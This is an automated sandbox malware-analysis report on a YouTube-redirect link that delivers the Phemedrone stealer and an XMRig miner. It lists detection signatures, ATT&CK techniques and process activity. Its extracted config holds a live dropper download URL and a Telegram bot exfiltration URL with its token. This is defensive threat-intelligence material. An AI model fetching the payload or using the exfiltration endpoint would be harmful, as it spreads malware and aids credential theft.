phemedrone | hxxps://www[.]youtube[.]com/redirect?event=video_description&redir_token=QUFFLUhqbHhTa2RYdVAtd2NaVDR4TUdqUDJqcngzcVU2Z3xBQ3Jtc0traDhZc0IzaEJQOTdDdmp6RVVjNTBSTmVlUG40ZjA2cUdBd3EtTm5PTmQzVk4tMzNYSnBBZm83dlRpVFZTYnVQalNLTXluMlEtZHliRW84NGdXR2tja0dPME9lMVNXMklIOUhobFNGNEFPY2lKNVpIaw&q=https%3A%2F%2Fdrive[.]google[.]com%2Ffile%2Fd%2F1m7fM9UIs0mT0UxEmGt-F-5UyJ5NzzqsG%2Fview%3Fusp%3Dsharing&v=P2N_aDjlwMg

Analysis

max time kernel
168s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-08-2024 07:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbHhTa2RYdVAtd2NaVDR4TUdqUDJqcngzcVU2Z3xBQ3Jtc0traDhZc0IzaEJQOTdDdmp6RVVjNTBSTmVlUG40ZjA2cUdBd3EtTm5PTmQzVk4tMzNYSnBBZm83dlRpVFZTYnVQalNLTXluMlEtZHliRW84NGdXR2tja0dPME9lMVNXMklIOUhobFNGNEFPY2lKNVpIaw&q=https%3A%2F%2Fdrive.google.com%2Ffile%2Fd%2F1m7fM9UIs0mT0UxEmGt-F-5UyJ5NzzqsG%2Fview%3Fusp%3Dsharing&v=P2N_aDjlwMg

Score

10^/10

phemedrone xmrig discovery evasion execution miner persistence stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7253527125:AAG2zbXlkuY33BxLSZk2mcohhToET22xkTM/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/3248-332-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-333-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-337-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-335-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-339-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-338-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-336-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-391-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3248-392-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
115	3212	powershell.exe
117	4864	powershell.exe
133	4268	powershell.exe
135	452	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4952	powershell.exe
2328	powershell.exe
3212	powershell.exe
3016	powershell.exe
3212	powershell.exe
4864	powershell.exe
4268	powershell.exe
452	powershell.exe
2288	powershell.exe
1556	powershell.exe
1132	powershell.exe
1216	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 11 IoCs

pid	Process
2716	drivers.exe
3016	installer.exe
4652	drivers.exe
1552	installer.exe
3144	ayfvnajiment.exe
4944	drivers.exe
1524	installer.exe
4164	ayfvnajiment.exe
4636	drivers.exe
1484	installer.exe
4468	ayfvnajiment.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3248-328-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-329-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-332-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-333-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-331-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-330-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-327-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-337-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-335-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-339-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-338-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-336-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-391-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3248-392-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
29	drive.google.com
30	drive.google.com
31	drive.google.com
32	drive.google.com
126	pastebin.com
127	pastebin.com

Power Settings 1 TTPs 24 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1048	powercfg.exe
1672	powercfg.exe
2108	powercfg.exe
2928	powercfg.exe
688	powercfg.exe
1520	powercfg.exe
712	powercfg.exe
2716	powercfg.exe
2688	powercfg.exe
3748	powercfg.exe
4636	powercfg.exe
4604	powercfg.exe
1588	powercfg.exe
1008	powercfg.exe
2716	powercfg.exe
4136	powercfg.exe
1644	powercfg.exe
3704	powercfg.exe
4344	powercfg.exe
4620	powercfg.exe
5024	powercfg.exe
3544	powercfg.exe
1280	powercfg.exe
724	powercfg.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2716 set thread context of 3248	2716	drivers.exe	142
PID 4652 set thread context of 4300	4652	drivers.exe	170
PID 3144 set thread context of 4888	3144	ayfvnajiment.exe	197
PID 3144 set thread context of 3248	3144	ayfvnajiment.exe	201
PID 4944 set thread context of 860	4944	drivers.exe	227
PID 4636 set thread context of 4108	4636	drivers.exe	283

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1948	sc.exe
180	sc.exe
2584	sc.exe
4100	sc.exe
4232	sc.exe
4956	sc.exe
3308	sc.exe
436	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 4 IoCs

pid	pid_target	Process	procid_target
4016	3248	WerFault.exe	142
4400	4300	WerFault.exe	170
2480	860	WerFault.exe	227
4016	4108	WerFault.exe	283

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	drivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	drivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	drivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	drivers.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3948	PING.EXE
2844	PING.EXE
5024	PING.EXE
4156	PING.EXE

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	msedge.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
3948	PING.EXE
2844	PING.EXE
5024	PING.EXE
4156	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3928	msedge.exe
3928	msedge.exe
4744	msedge.exe
4744	msedge.exe
4520	identity_helper.exe
4520	identity_helper.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
1048	msedge.exe
1048	msedge.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
2328	powershell.exe
2328	powershell.exe
2328	powershell.exe
3428	taskmgr.exe
2288	powershell.exe
2288	powershell.exe
2288	powershell.exe
3212	powershell.exe
3212	powershell.exe
3212	powershell.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3428	taskmgr.exe
Token: SeSystemProfilePrivilege	3428	taskmgr.exe
Token: SeCreateGlobalPrivilege	3428	taskmgr.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeShutdownPrivilege	1672	powercfg.exe
Token: SeCreatePagefilePrivilege	1672	powercfg.exe
Token: SeShutdownPrivilege	4136	powercfg.exe
Token: SeCreatePagefilePrivilege	4136	powercfg.exe
Token: SeShutdownPrivilege	2716	powercfg.exe
Token: SeCreatePagefilePrivilege	2716	powercfg.exe
Token: SeShutdownPrivilege	1048	powercfg.exe
Token: SeCreatePagefilePrivilege	1048	powercfg.exe
Token: SeShutdownPrivilege	3704	powercfg.exe
Token: SeCreatePagefilePrivilege	3704	powercfg.exe
Token: SeShutdownPrivilege	1644	powercfg.exe
Token: SeCreatePagefilePrivilege	1644	powercfg.exe
Token: SeShutdownPrivilege	1588	powercfg.exe
Token: SeCreatePagefilePrivilege	1588	powercfg.exe
Token: SeShutdownPrivilege	4604	powercfg.exe
Token: SeCreatePagefilePrivilege	4604	powercfg.exe
Token: SeLockMemoryPrivilege	3248	svchost.exe
Token: 33	3428	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3428	taskmgr.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	1132	powershell.exe
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeShutdownPrivilege	5024	powercfg.exe
Token: SeCreatePagefilePrivilege	5024	powercfg.exe
Token: SeShutdownPrivilege	2688	powercfg.exe
Token: SeCreatePagefilePrivilege	2688	powercfg.exe
Token: SeShutdownPrivilege	1008	powercfg.exe
Token: SeCreatePagefilePrivilege	1008	powercfg.exe
Token: SeShutdownPrivilege	2108	powercfg.exe
Token: SeCreatePagefilePrivilege	2108	powercfg.exe
Token: SeShutdownPrivilege	4344	powercfg.exe
Token: SeCreatePagefilePrivilege	4344	powercfg.exe
Token: SeShutdownPrivilege	688	powercfg.exe
Token: SeCreatePagefilePrivilege	688	powercfg.exe
Token: SeShutdownPrivilege	2928	powercfg.exe
Token: SeCreatePagefilePrivilege	2928	powercfg.exe
Token: SeShutdownPrivilege	4620	powercfg.exe
Token: SeCreatePagefilePrivilege	4620	powercfg.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeDebugPrivilege	2860	taskmgr.exe
Token: SeSystemProfilePrivilege	2860	taskmgr.exe
Token: SeCreateGlobalPrivilege	2860	taskmgr.exe
Token: SeShutdownPrivilege	3544	powercfg.exe
Token: SeCreatePagefilePrivilege	3544	powercfg.exe
Token: SeShutdownPrivilege	1280	powercfg.exe
Token: SeCreatePagefilePrivilege	1280	powercfg.exe
Token: SeShutdownPrivilege	724	powercfg.exe
Token: SeCreatePagefilePrivilege	724	powercfg.exe
Token: SeShutdownPrivilege	2716	powercfg.exe
Token: SeCreatePagefilePrivilege	2716	powercfg.exe
Token: SeShutdownPrivilege	4636	powercfg.exe
Token: SeCreatePagefilePrivilege	4636	powercfg.exe
Token: SeShutdownPrivilege	3748	powercfg.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe
3428	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1552	OpenWith.exe
1552	OpenWith.exe
1552	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4744 wrote to memory of 4804	4744	msedge.exe	83
PID 4744 wrote to memory of 4804	4744	msedge.exe	83
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 2680	4744	msedge.exe	84
PID 4744 wrote to memory of 3928	4744	msedge.exe	85
PID 4744 wrote to memory of 3928	4744	msedge.exe	85
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86
PID 4744 wrote to memory of 4760	4744	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbHhTa2RYdVAtd2NaVDR4TUdqUDJqcngzcVU2Z3xBQ3Jtc0traDhZc0IzaEJQOTdDdmp6RVVjNTBSTmVlUG40ZjA2cUdBd3EtTm5PTmQzVk4tMzNYSnBBZm83dlRpVFZTYnVQalNLTXluMlEtZHliRW84NGdXR2tja0dPME9lMVNXMklIOUhobFNGNEFPY2lKNVpIaw&q=https%3A%2F%2Fdrive.google.com%2Ffile%2Fd%2F1m7fM9UIs0mT0UxEmGt-F-5UyJ5NzzqsG%2Fview%3Fusp%3Dsharing&v=P2N_aDjlwMg
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf91c46f8,0x7ffdf91c4708,0x7ffdf91c4718
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
  2⤵
  PID:1320
